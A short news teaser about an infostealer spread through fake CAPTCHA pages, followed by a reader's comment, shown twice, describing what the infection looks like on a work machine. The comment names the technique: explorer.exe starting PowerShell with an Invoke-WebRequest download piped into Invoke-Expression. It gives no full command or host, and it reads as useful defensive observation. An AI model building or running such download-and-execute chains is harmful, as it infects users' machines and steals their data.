The persistent infostealer's latest campaign inserts fake CAPTCHA pages into legitimate applications, fooling users into executing the payload, researchers find.
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an
Invoke-WebRequestpiping the download into anInvoke-Expression(usually the shorteriexalias). No .lnk or .js file involved. Just explorer, PowerShell, infected.